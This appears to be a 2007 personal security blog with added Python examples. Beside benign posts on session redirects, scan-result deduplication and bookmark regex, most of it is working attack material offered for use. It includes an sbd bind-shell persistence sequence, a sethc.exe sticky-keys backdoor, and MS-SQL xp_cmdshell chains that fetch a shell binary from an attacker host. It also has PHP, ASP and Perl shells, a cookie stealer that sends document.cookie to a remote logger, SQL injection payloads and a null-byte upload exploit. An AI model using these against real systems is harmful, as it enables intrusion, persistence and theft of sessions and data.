It's the code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA.... what now? Ruby?
No wait.. it should be just RUBY!

20070403

Session redirect in php and asp

These are examples of the correct way to handle access checks and redirects in sessions in ASP (classic, VBScript) and PHP. I don't know how many times I have seen this done wrong: the redirect header goes out, but the script keeps running, so the protected content is still sent in the body of the 302 and anyone who ignores the redirect (curl, a proxy, a scanner) reads it.

ASP example

<%
If Not Session("Authenticated") = 1 Then
    Response.Redirect "login.asp"
    ' In classic ASP, Response.Redirect ends the response (an implicit Response.End),
    ' so nothing below this line runs for an unauthenticated user.
    ' The ASP.NET overload Response.Redirect("login.asp", True) behaves the same,
    ' and True is already the default there.
End If
%>



PHP Example
<?php
session_start();                       // without this $_SESSION is never populated
if (!isset($_SESSION['access']) || $_SESSION['access'] !== "yes")
{
    header("Location: login.php");     /* Redirect browser */
    exit;                              /* Make sure that code below does not get executed when we redirect. */
}
// Code following should not be executed unless authenticated.
echo "secure code";
?>


Note: since PHP 4.4.2 and PHP 5.1.2, header() prevents more than one header from being sent at once (a value containing a line break is rejected) as a protection against header injection attacks. It does nothing about the missing exit; that is still your job.
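The missing-exit bug and its fix, as an added example that is not code from the original post: two tiny WSGI handlers driven in-process by fetch(), so nothing listens on a port. The cookie name, the paths and the "secure code" body are made up for the example.

```python
# Added example (not code from the original post): the missing-exit bug and
# its fix as two tiny WSGI handlers, driven in-process by fetch() so nothing
# listens on a port. The cookie name, paths and "secure code" body are made up.
SECRET_BODY = b"secure code\n"


def session_is_authenticated(environ):
    """Stand-in for $_SESSION['access'] == 'yes': trust a constructed cookie."""
    return "access=yes" in environ.get("HTTP_COOKIE", "").split("; ")


def redirect(start_response, location):
    """Send a 302. CR/LF in the target is refused, which is the check that
    PHP's header() grew in 4.4.2/5.1.2 against header injection."""
    if "\r" in location or "\n" in location:
        raise ValueError("refusing to put a line break in a Location header")
    start_response("302 Found", [("Location", location), ("Content-Type", "text/html")])


def vulnerable_app(environ, start_response):
    """header('Location: ...') without exit: the 302 goes out, and so does
    everything the script produces afterwards, including the secret body."""
    if not session_is_authenticated(environ):
        redirect(start_response, "/login.php")
        # falls through: this is the bug
    else:
        start_response("200 OK", [("Content-Type", "text/html")])
    return [SECRET_BODY]


def fixed_app(environ, start_response):
    """Same check, with the redirect path leaving immediately and empty."""
    if not session_is_authenticated(environ):
        redirect(start_response, "/login.php")
        return [b""]
    start_response("200 OK", [("Content-Type", "text/html")])
    return [SECRET_BODY]


def fetch(app, cookie=""):
    """Call a WSGI app directly; returns (status, headers dict, body bytes)."""
    seen = {}

    def start_response(status, headers):
        seen["status"], seen["headers"] = status, dict(headers)

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": "/secret.php", "HTTP_COOKIE": cookie}
    body = b"".join(app(environ, start_response))
    return seen["status"], seen["headers"], body


if __name__ == "__main__":
    for name, app in (("vulnerable", vulnerable_app), ("fixed", fixed_app)):
        status, headers, body = fetch(app)   # no session cookie at all
        print(f"{name:10s} {status} Location={headers.get('Location')} body={body!r}")
```

The same check on a live server is `curl -s -D - http://host/secret.php` with no session cookie: a correct page shows the 302 and an empty body, a broken one shows the 302 with the protected page underneath it.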

20070330

Month of ... bugs

1. Month of browser bugs
2. Month of apple bugs
3. Month of kernel bugs
4. Month of PHP bugs
5. Month of MySPACE bugs

eh.. ergg.. cough.. die. this fad is getting old.. I hate even commenting on this at all.

20070328

Setting and Confirming reg keys w/meterpreter.

Super quick meterpreter sequence for a Run-key autostart of an sbd bind shell.

Prep (upload the listener binary)
upload c:\\sbdbg.exe c:\\windows\\system32\\


Set (-a 127.0.0.1 binds the listener to loopback only; -r0 makes sbd re-listen after each client disconnects)
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbg.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"


Verify (the value name must show up in the enumeration and query back with the same data)
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor


Use
(reboot, or wait for the next interactive logon; HKLM\...\Run fires for every user who logs on. Because the listener is bound to 127.0.0.1, you reach it through a port forward on the box, not directly.)

20070323

Comparing Common Vulnerability Result Sets

One of the major things I've been working on is bringing together vulnerability result information. I found it a major pain to remove duplicate entries from result sets. I was finally able to come up with a listing based on CVE / BID tracking numbers:

An example corresponding file could be something like this

Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]

Just extracting Nessus information can be a huge problem. Because of the lack of structure within the NASL scripting language, there are many, many variations on the output generated by the plugins. I've made some additional changes to an old tool.

nessus_extract.pl (version 1.7) [download perl]

I added pipes into the fray, generating a recursive-style CSV that separates BID and CVE numbers, as well as a more robust double-quote word qualifier.

One huge help is the Open Source Vulnerability Database (OSVDB), which has come a long way.
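The extraction and the CVE/BID join, as an added example that is not the original nessus_extract.pl: it pulls CVE and BID numbers out of free-text findings, writes the pipe-delimited, double-quote-qualified CSV described above, and merges two scanners' result sets on those numbers. The findings below are constructed sample data; real plugin output is messier.

```python
# Added example, not the original nessus_extract.pl: pull CVE and BID numbers
# out of free-text findings, emit the pipe-delimited CSV with double-quote
# qualifiers the post describes, and join two scanners' result sets on those
# numbers. The findings below are constructed; real plugin output is messier.
import csv
import io
import re

CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.IGNORECASE)
# "BID : 19409", "BID 19409", "bid#19409" or a securityfocus.com/bid/19409 link
BID_RE = re.compile(r"\bBID\s*[:#]?\s*(\d{3,})\b|\bbid/(\d{3,})\b", re.IGNORECASE)

# (scanner, host, port, finding text): constructed sample data
NESSUS = [
    ("nessus", "10.0.0.5", "445/tcp",
     "MS06-040 buffer overrun in Server service.\nCVE : CVE-2006-3439\nBID : 19409"),
    ("nessus", "10.0.0.5", "80/tcp",
     "Apache mod_rewrite off-by-one (CVE-2006-3747), see http://www.securityfocus.com/bid/19204"),
    ("nessus", "10.0.0.7", "1433/tcp",
     "SQL Server 'sa' account has a blank password."),      # no tracking number at all
]
GUARDIAN = [
    ("guardian", "10.0.0.5", "445/tcp", "Server Service Overflow | BID 19409; CVE-2006-3439"),
    ("guardian", "10.0.0.5", "80/tcp", "mod_rewrite LDAP scheme overflow CVE-2006-3747"),
]


def extract_ids(text):
    """(sorted CVE list, sorted BID list) found anywhere in one finding."""
    cves = sorted({m.upper() for m in CVE_RE.findall(text)})
    bids = sorted({a or b for a, b in BID_RE.findall(text)}, key=int)
    return cves, bids


def to_pipe_csv(findings):
    """scanner|host|port|cve;cve|bid;bid|description, double-quoting only the
    fields that contain a pipe, a quote or a line break."""
    out = io.StringIO()
    writer = csv.writer(out, delimiter="|", quotechar='"',
                        quoting=csv.QUOTE_MINIMAL, lineterminator="\n")
    writer.writerow(["scanner", "host", "port", "cve", "bid", "description"])
    for scanner, host, port, text in findings:
        cves, bids = extract_ids(text)
        writer.writerow([scanner, host, port, ";".join(cves), ";".join(bids),
                         " ".join(text.split())])
    return out.getvalue()


def dedupe(*result_sets):
    """Merge result sets. Two findings are the same finding when host, port and
    the first CVE agree (BID when there is no CVE, the raw text when there is
    neither). Returns {key: set of scanners that reported it}."""
    merged = {}
    for findings in result_sets:
        for scanner, host, port, text in findings:
            cves, bids = extract_ids(text)
            ident = cves[0] if cves else (bids[0] if bids else " ".join(text.split()))
            merged.setdefault((host, port, ident), set()).add(scanner)
    return merged


if __name__ == "__main__":
    print(to_pipe_csv(NESSUS + GUARDIAN))
    for key, scanners in dedupe(NESSUS, GUARDIAN).items():
        print(key, sorted(scanners))
```

Keying on the first CVE is a deliberate simplification: a finding that carries several CVEs (one plugin covering a whole bulletin) may need to be split before it will line up with a scanner that reports them one at a time.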

20070315

Pentest Order of Objects..

ISSAF was used in conjunction with the latest BackTrack release.
Although it is not my company's standard it is quite close.

Not to be too open.. but this has led to a really good idea for object-oriented coding.

Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT

INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Searchengine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS-Fingerprinting
-Portscanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping(Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (metasploit)
-Exploits (CoreImpact / Canvas)
-Exploits (milworm /secfocus)

GAINING ACCESS AND PRIVILEGE ESCALATION

-Password Attacks
-Default Conf Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (ie. WMI,SNMP,CDP)
-Pull Passwords (hashes, SAM FILES)
-Privileged Assessment (repeat all steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Portknocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning

20070313

SBD as netcat

Yeah so I rattle off some SBD stuff sometimes.. I'm referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor, located at http://tigerteam.se/dl/sbd/. This is my preferred "swiss army knife" because of its default configuration of encryption (AES-CBC-128 + HMAC-SHA1) and dangerous execution binding (-e command).



Netcat and its NC clones:

  • netcat - "swiss army knife"
  • sbd & sbdbg.exe - shadowinteger's backdoor
  • netcat6 - swiss army knife+ for ipv6
  • cryptcat - netcat with twofish encryption
  • socat - multipurpose relay (netcat++) with IPv6/SSL. Example: listen on IPv6 port 8080 and relay every connection through the HTTP proxy "proxy" to www.domain.com:80
    socat TCP6-LISTEN:8080,reuseaddr,fork PROXY:proxy:www.domain.com:80

Simpler tools:
None of this is news.. I just wanted to point out some of this simple stuff.

20070308

sbd fun as a rootkit via sethc.exe

SBD Fun

Transferring files
RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 -q 10


Transferring files through .tar.gz
RCV: sbd -l -p 4337 | tar xvfpz -
XMIT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337


Port scan:
echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000


Using cmd.exe as a service binary
In my experience this is flaky at best.

create then start service (sc wants the service type spelled out as interactive and own-process):
sc create testsvc binpath= "cmd /K start" type= interact type= own
sc start testsvc


Note that SC START immediately creates a new CMD window, even though the original CMD window fails to start with error 1053 (expected, since CMD.EXE doesn't have any service related code in it).

When the SCM starts a service it expects the process to call StartServiceCtrlDispatcher and register a control handler with RegisterServiceCtrlHandler within its start timeout; a process that never does is reported as failed with 1053.

We may want to fix any C program to actually make those calls if loading it as a legitimate service.

Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost.exe in this example.)
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    // Launch the renamed sbd as a bind shell on 4337.
    // -a 127.0.0.1 restricts the listener to localhost only, please;
    // -r0 makes it re-listen after every disconnect.
    system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
    return EXIT_SUCCESS;
}


Rootkit portion
Rename the output binary to sethc.exe and drop it over %SystemRoot%\system32\sethc.exe. Works ok.

Prefetch restrictions.
Remember to delete any existing sethc.exe prefetch entries (SETHC.EXE-*.pf) in c:\windows\prefetch prior to use. On XP/2003 also expect Windows File Protection to put the original back from system32\dllcache unless that copy is replaced too.

Interesting Note about RDC
Sticky Keys [left-shift x5] (sethc.exe) works through Remote Desktop Connections (RDC/RDP), including at the logon screen, where it runs as SYSTEM. Funny how suddenly that makes this all the more interesting.

Apparently SYSTEM-level security sweeps and shuts down all unknown processes about 5 minutes into the session.

Could a fake WM_CLOSE handler get around that, or does it terminate outright?

20070307

PNG Listener w/logger

This is an example of a simple PNG listener with a logging mechanism: it logs whatever arrives in the c parameter together with the caller's address and answers with a 1x1 PNG, so it can sit behind an <img> tag.
(Do I really have to explain how to use this?)

<?php
$cookie = $_GET["c"];
if ($cookie == "init") {
    $file = fopen('001.txt', 'w');            // "init" truncates and restarts the log
    fwrite($file, ":: 00* Logger:: \n");
} else {
    $file = fopen('001.txt', 'a');
    fwrite($file, $_SERVER['REMOTE_ADDR'] . "=>" . $cookie . "\n");
}
fclose($file);
header("Content-type: image/png");
$im = imagecreate(1, 1);                       // needs the GD extension
$background = imagecolorallocate($im, 255, 255, 255);
imagepng($im);
imagedestroy($im);
?>


I developed this snippet while working on a solution for browser history leaks.

SQL injection and identification

Identify the SQL server through blind SQL injection

MySQL version comments: MySQL executes the body of /*!NNNNN ... */ only when its own version is at least NNNNN; every other database treats the whole thing as a comment.

http://example.com/index.php?some_var=1/*!40017%20s*/

The comment body here is the garbage "s", so if the page changes (error or empty result) the server is MySQL 4.0.17 or later; if nothing changes it is older, or not MySQL at all.

## String concatenation operator: || ==> PostgreSQL, Oracle
## String concatenation operator: +  ==> MS-SQL, MS-Access
## (MySQL uses CONCAT(); || is logical OR there unless PIPES_AS_CONCAT is set)

Normal union attack
$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--
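The /*!40017 s*/ probe above generalised into a binary search over MySQL version numbers, as an added example that is not code from the original post. Nothing here touches a network: mock_oracle() is a constructed model of a server at one version. Against a live target, replace it with a function that fetches the page with the probe appended and returns True when the response differs from the baseline.

```python
# Added example, not from the original post: the /*!40017 s*/ probe above turned
# into a binary search over MySQL version numbers. Nothing here touches a
# network; the oracle is a constructed model of a server at one version. For a
# live target replace mock_oracle() with a function that fetches the page with
# the probe and returns True when the response differs from the baseline.
from urllib.parse import quote


def version_comment_probe(version_num, body="s"):
    """MySQL runs the text inside /*!NNNNN ... */ only when its version is
    >= NNNNN; everybody else sees a comment. With garbage as the body the
    query breaks exactly on MySQL >= NNNNN, which is the signal we need."""
    return f"/*!{version_num:05d} {body}*/"


def build_url(base, param, version_num, value="1"):
    """URL with the probe appended to the injectable parameter, encoded the
    way the page's example is (only the space becomes %20)."""
    return f"{base}?{param}={value}{quote(version_comment_probe(version_num), safe='/*!')}"


def mock_oracle(server_version_num):
    """Constructed stand-in for the target: returns an oracle(version_num)
    that says whether the probe changed the page, and records its requests."""
    calls = []

    def oracle(version_num):
        calls.append(version_num)
        return server_version_num >= version_num

    oracle.calls = calls
    return oracle


def fingerprint_mysql_version(oracle, low=30000, high=99999):
    """Largest NNNNN whose probe still changes the page, i.e. the exact
    version, found by binary search (under 20 requests for this range).
    Returns None when even the lowest probe is ignored: not MySQL, or the
    comment is being stripped before the query is built."""
    if not oracle(low):
        return None
    while low < high:
        mid = (low + high + 1) // 2
        if oracle(mid):
            low = mid
        else:
            high = mid - 1
    return low


def dotted(version_num):
    """40017 -> '4.0.17', 50045 -> '5.0.45'."""
    return f"{version_num // 10000}.{version_num // 100 % 100}.{version_num % 100}"


if __name__ == "__main__":
    oracle = mock_oracle(50045)
    found = fingerprint_mysql_version(oracle)
    print(build_url("http://example.com/index.php", "some_var", 40017))
    print(f"MySQL {dotted(found)} after {len(oracle.calls)} requests")
```

A live oracle has to compare against a baseline request made with a harmless body (for example an empty one), so that rate limiting or a flapping page does not get read as a version signal.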


MS-SQL

Check if we are sysadmin (the hex decodes to 'sysadmin', so the role name never appears in the request)
IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))


Check whether ad hoc remote queries are available:
MSSQL_OPENQUERY
(select 1 from OPENQUERY([$servername],'select 1'))


MSSQL_OPENROWSET
(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))

or
(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))


If we have a linked server and sa
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

The fourth line is the read-back: cmd is varchar and it is compared with an int, so the server fails the conversion and its error message quotes the row's text, one line of dir output per query (walk id from 1 up to the count). Drop the table when done.

If already sa
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')

Other things to do
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

20070306

reverse-shell from SQL server

So you got the super secret sa password (or they left it blank?). Strictly this ends in a bind shell: sbd listens on the SQL box and you connect in.

osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"

{SQL template}
osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"

Pull data back to the SQL box with what is already on it:

c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe

Or be obvious:
net user [name] [password] /add

On the semi-evil box host (serve TFTP or FTP):
sbdbg.exe

{SQL template} set up FTP command script (binary mode, or the exe arrives corrupted):
ECHO BINARY > script.ftp
ECHO GET sbdbg.exe >> script.ftp
ECHO QUIT >> script.ftp

{SQL template} execute FTP script (-A logs in anonymously):
FTP -s:script.ftp -A semi.evil.host.ip

{SQL template} set up the listener:
echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat

{SQL template} get time on server (so the job is scheduled on the box's clock, not yours):
time
Or skip the query and send ICMP timestamp requests instead.

{SQL template} schedule execution of the bat file (at jobs run as SYSTEM):
at \\sql.vuln.box 04:20 evil.bat

connect from any.evil.ip
sbd sql.vuln.box 4337

Just some simple shell notes:

Image inclusion
php (server side - local/remote)
- include/require executes any <?php ... ?> block found anywhere in the file, so a PHP payload stored in a JPEG comment segment runs when the image path is fed to include()
IE (client side - local)
- content sniffing: IE looks at the file contents rather than the Content-Type, so an image file that contains HTML can be rendered as HTML

PNG headers
\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <= PNG signature
\x00\x00\x00\x0d <= chunk length (13)
\x77\x6f\x6f\x74 <= chunk id "woot" (lower-case first letter = ancillary, decoders skip it; a real file's first chunk is IHDR)
\x00\x00\x00\x01 <= width
\x00\x00\x00\x01 <= height
(In IHDR width comes before height, then bit depth, colour type, compression, filter and interlace bytes; every chunk ends with a CRC32 over its id and data.)

Comment writers for jpegs
edjpgcom

Basic php shell
<?php
ob_clean();
system("[command]");
die();
?>


Using echo
For Windows:
echo: carets (^) are the escape character, so < > | & reach the file instead of being taken as cmd.exe redirects.
echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext

unix:
write "lol" from echo with hex escapes (no newline) to a file
echo -en "\x6c\x6f\x6c" > file.ext


SBD (netcat style):
File receiving
sbd -lvp 1234 < NUL > outfile.ext
Banner grabbing (-c off disables sbd's encryption so a plain server can talk to us)
sbd -c off -v www.microsoft.com 80
Binding shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"

Although plink -raw and telnet are not as good, they can work.

Play with Cookies

Simple cookie push (cookies flagged HttpOnly never show up in document.cookie, so this only gets the rest)
<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>


Cookie view
javascript:alert(document.cookie);


Manipulate cookie
javascript:void(document.cookie="variable=value");


stealer.php
<?php
/* Ethernets Cookie Stealer */
/* Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>


Other stealers
<?php
$cookie = $_GET["c"];
$file = fopen('000.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);

// bounce the victim back to the page they came from so nothing looks odd
$Redirect = getenv("HTTP_REFERER");
echo "<script>window.location.replace(" . json_encode($Redirect) . ")</script>";
?>


Perl shell (a bind shell: listens on $port and hands each connection a shell)
#!/usr/bin/perl
use strict;
use Socket;
my $port   = 911;
my $proto  = getprotobyname('tcp');
my $system = 'cmd.exe';            # '/bin/sh' on unix
my $paddr;
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for (; $paddr = accept(CLIENT, SERVER); close CLIENT) {
    # point the shell's stdin/stdout/stderr at the socket, then run it
    open(STDIN,  ">&CLIENT");
    open(STDOUT, ">&CLIENT");
    open(STDERR, ">&CLIENT");
    system($system);
    close(STDIN);
    close(STDOUT);
    close(STDERR);
}


ASP quicky whoami?
<%
Dim objNetwork
Response.Write "Shell Test.."
Set objNetwork = Server.CreateObject("WScript.Network")
Response.Write objNetwork.UserName    ' the identity the ASP page runs as
Set objNetwork = Nothing
%>


ASP Shell
- WshShell.Exec will most likely fail with error '80070005' (access denied) under the IIS worker identity, so use Run with the output redirected to a file and read the file back.
<%
Dim wshell, intReturn
Set wshell = Server.CreateObject("WScript.Shell")
intReturn = wshell.Run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write(intReturn)             ' exit code of the command
Set wshell = Nothing
%>


Curl into older PHP servers from chroot skeletons.

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);   // return the body instead of printing it
$file = curl_exec($ch);
print_r(curl_getinfo($ch));                       // status, redirects, timings (only meaningful after exec)
curl_close($ch);

echo '<br>Post Curl<br>';
$data = $file;

print $data;
?>


Null Bytes
PHP garbage
The null byte is sent as '%00' in the URL; PHP decodes it to a real 0x00 and, before PHP 5.3.4, hands it on to the C filesystem functions, which stop reading the name there. The extension check sees a .jpg, the open sees c99.php:
C:\c99.php%00.jpg

CGI null byte stuff too.. (same thing in Perl CGI and anything else that passes a counted string to a C API)
see... php null byte

ASP null byte
When a filename is sent using a multipart/form-data POST the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.

POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM

-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe[NUL].png"
Content-Type: text/plain

-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"

Upload
-----------------------------AAAAAAAAAAAAA--

([NUL] stands for a raw 0x00 byte in the request; the Content-Length is illustrative.)
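The truncation described in both the PHP and the ASP cases above, reproduced in miniature as an added example that is not code from the original post. The check runs on a counted string (PHP, VBScript and Python all know the real length); the file API underneath takes a C string and stops at the first 0x00. The allow-list and file names are made up; modern Python itself refuses a NUL in open() with a ValueError, which is the behaviour the hardened version copies.

```python
# Added example, not from the original post: the null-byte truncation above
# reproduced in miniature. The check runs on a counted string (PHP, VBScript
# and Python all know the real length); the file API underneath takes a C
# string and stops at the first 0x00. The allow-list and file names are made
# up for the example.
from urllib.parse import unquote

ALLOWED_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")


def as_c_string(name):
    """What a NUL-terminated consumer (fopen, FileSystemObject) actually sees."""
    return name.split("\x00", 1)[0]


def naive_extension_check(name):
    """The vulnerable check: looks at the whole counted string."""
    return name.lower().endswith(ALLOWED_EXTENSIONS)


def naive_save_target(name):
    """Vulnerable flow: passes the check on '.jpg', then the C layer truncates.
    Returns the path that would really be written, or None when rejected."""
    if not naive_extension_check(name):
        return None
    return as_c_string(name)


def hardened_save_target(name):
    """Fixed flow: refuse NUL and other control bytes before any other
    inspection, work on the basename only, and keep the check on the same
    string that is handed to the filesystem."""
    if not name or any(ord(ch) < 0x20 for ch in name):
        return None
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    if not base or not base.lower().endswith(ALLOWED_EXTENSIONS):
        return None
    return base


def from_url(param):
    """The page's C: c99.php%00.jpg case arrives URL-encoded; PHP decodes
    %00 to a real 0x00 before user code ever sees it."""
    return unquote(param)


if __name__ == "__main__":
    for raw in ("c99.php%00.jpg", "photo.jpg", "c:%5Csbd.exe%00.png"):
        name = from_url(raw)
        print(f"{raw:24s} naive -> {naive_save_target(name)!r:16s} hardened -> {hardened_save_target(name)!r}")
```

The fix is the ordering, not the extension test: reject the byte first, and never let a name reach a C API that the check has not seen in exactly that form.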

20070215

Gmail HTML Signatures - GreaseMonkey script

So of course you can't create HTML signatures in Gmail... ergg!

Silly rabbit, you can drag and drop images/html into the Gmail rich-text editor...
well that just will not do.

So that would mean - Greasemonkey script! I'm not going to waste any time here.
GMAIL HTML SIGNATURE - Install this Script
//
// Released under the CC Attribution 2.5 license
// http://creativecommons.org/licenses/by/2.5/
// --------------------------------------------------------------------
//
// This is a Greasemonkey user script.
//
// To setup, insert html signature code into:
// * html_signature
// --------------------------------------------------------------------
//
// ==UserScript==
// @name GMAIL HTML Signature
// @namespace http://shad0wbq.answorld.com/
// @description Insert HTML signature into GMAIL
// @include http://gmail.google.com/*
// @include https://gmail.google.com/*
// @include http://mail.google.com/*
// @include https://mail.google.com/*
// ==/UserScript==
//
var html_signature = '<div style="margin: 0 auto 0 auto; margin-top: 5px; margin-bottom: 5px;" >' +
'<a href="http://feeds.feedburner.com/Codeburst">' +
'<img src="http://feeds.feedburner.com/Codeburst.gif" style="border:0" alt="codeBurst"/>' +
'</a></div>';

window.setTimeout(function() {
//Debug Frame window
// alert(window.frames[0].name);
if (window.frames[0])
{
if (window.frames[0].name == "v2_hc_compose")
{
var logo = window.frames[0].document.createElement("div");
logo.innerHTML = '<br><br>' + html_signature
window.frames[0].document.body.insertBefore(logo,window.frames[0].document.body.lastChild);
}
}
}, 600);

20070212

del.icio.us Regex

I was working on bringing my collection of bookmarks into del.icio.us. There is still some work to be done on the del.icio.us web interface, and most of the API apps that I used just didn't fit the bill, so some quick regex helped with import and export.

Main use for this was to enable sharing on all imported bookmarks.

So we need some regex for implementations on the API.

del.icio.us can read and export Netscape bookmark files.

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Bookmarks</title>
<h1>Bookmarks</h1>
<dl><p>
</p><dt><a href="http://www.testtest.com/" last_visit="117002438" add_date="117002438" tags="wee,w00t">test test</a>
</dt></dl>

These can very easily be modified via regex to work as API calls.
Example API calls
https://api.del.icio.us/v1/posts/add?&url=http://www.testtest.com/&description=test test&tags=wee%20w00t&replace=yes&shared=yes
https://api.del.icio.us/v1/posts/delete?&url=http://www.testtest.com/


Regex conversion for del.icio.us (back-references: \2 is the URL, \4 the tags, \6 the description)
(<dt><a href=")(.*)(" tags=")(.*)(">)(.*)(</a></dt>)
https://api.del.icio.us/v1/posts/add?&url=\2&description=\6&tags=\4&replace=yes&shared=yes

Two things to watch on a real export: the greedy (.*) after href=" also swallows the last_visit and add_date attributes into \2, so use ([^"]*) there, and the file's tags are comma separated while the API wants spaces (tags=wee%20w00t above).
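The same conversion with one capture per attribute, as an added example that is not the author's regex: last_visit and add_date no longer end up inside the URL, and the comma-separated tags become the space-separated list the posts/add call above uses. The bookmark line is the one from the page.

```python
# Added example (not the author's regex): the same Netscape-bookmark to
# posts/add conversion with one capture per attribute instead of a greedy
# (.*) across the tag, so last_visit/add_date do not end up inside the URL,
# and with the comma-separated tags turned into the space-separated list the
# API call above uses. The bookmark line is the one from the page.
import re
from urllib.parse import urlencode

BOOKMARK_RE = re.compile(
    r'<dt><a\s+href="([^"]*)"'          # group 1: url
    r'(?:\s+\w+="[^"]*")*?'             # any attributes between href and tags
    r'\s+tags="([^"]*)"'                # group 2: tags, comma separated in the file
    r'[^>]*>(.*?)</a>',                 # group 3: description
    re.IGNORECASE | re.DOTALL,
)

SAMPLE = ('<dt><a href="http://www.testtest.com/" last_visit="117002438" '
          'add_date="117002438" tags="wee,w00t">test test</a>')


def bookmark_to_api_call(line, shared=True):
    """One bookmark line -> the posts/add URL, or None if it is not a bookmark."""
    m = BOOKMARK_RE.search(line)
    if not m:
        return None
    url, tags, description = m.groups()
    params = {
        "url": url,
        "description": description,
        "tags": " ".join(t for t in tags.split(",") if t),
        "replace": "yes",
        "shared": "yes" if shared else "no",
    }
    return "https://api.del.icio.us/v1/posts/add?" + urlencode(params)


def convert_export(text):
    """Every bookmark in a Netscape export file, in file order."""
    return [call for call in map(bookmark_to_api_call, text.splitlines()) if call]


if __name__ == "__main__":
    print(bookmark_to_api_call(SAMPLE))
```

urlencode() also takes care of the encoding the hand-written call skipped (the URL's own ":" and "/" and the space in the description).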

20070207

Dirty Listing of Nessus Dangerous Plugins

Tenable Nessus .. needed the descriptions of the dangerous plugins, i.e. every script whose category is ACT_DESTRUCTIVE_ATTACK or ACT_DENIAL (ACT_DESTRUCT below is a prefix match; ACT_KILL_HOST and ACT_FLOOD are worth adding to the pattern too).

cd \progra~1\tenable\nessus\plugins\scripts\
